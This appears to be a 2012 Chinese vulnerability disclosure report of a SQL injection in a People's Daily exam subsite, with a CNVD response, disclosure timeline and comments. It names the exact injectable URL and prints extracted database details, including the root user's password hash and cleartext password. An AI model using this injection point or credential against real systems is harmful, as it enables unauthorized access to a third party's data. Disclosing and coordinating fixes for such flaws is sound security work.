漏洞概要
关注数(24)
关注此漏洞
漏洞标题:人民网分站注入
提交时间:2012-07-19 10:28
修复时间:2012-09-02 10:29
公开时间:2012-09-02 10:29
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:12
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
无
漏洞详情
披露状态:
2012-07-19: 细节已通知厂商并且等待厂商处理中
2012-07-20: 厂商已经确认,细节仅向厂商公开
2012-07-30: 细节向核心白帽子及相关领域专家公开
2012-08-09: 细节向普通白帽子公开
2012-08-19: 细节向实习白帽子公开
2012-09-02: 细节向公众公开
简要描述:
靠,跨站师也来搞注入。
详细说明:
注入点:http://kaoshi.edu.people.com.cn/gongwuyuan/zhiwei2010/detail.php?id=1
漏洞证明:
database management system users : root
database management system passwd :
password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
clear-text password: 123456
available databases [4]:
[*] official_job
[*] people_exam
[*] test
[*] test\_%
修复方案:
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:9
确认时间:2012-07-20 22:10
厂商回复:
CNVD确认漏洞情况,并尝试部分提权测试,与http://www.wooyun.org/bugs/wooyun-2012-09798一并协调涉事单位处置。
按部分影响机密性、可用性、完整性进行评分,rank=7.10*1.0*1.3=9.23
最新状态:
暂无
漏洞评价:
评论
-
2012-07-19 10:39 |
疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)
-
2012-07-19 10:47 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
-
2012-07-19 11:02 |
goderci ( 普通白帽子 | Rank:542 漏洞数:47 | http://www.yunday.org)
@xsser 好吧。其实这个是留着测试工具的,我昨天去看了几眼,确实略显犀利...
-
2012-07-19 11:52 |
only_guest ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)
-
2012-07-19 11:56 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
-
2012-07-19 13:20 |
瓜瓜 ( 普通白帽子 | Rank:173 漏洞数:25 )
-
2012-10-28 05:50 |
SbbS ( 实习白帽子 | Rank:31 漏洞数:3 | Sb)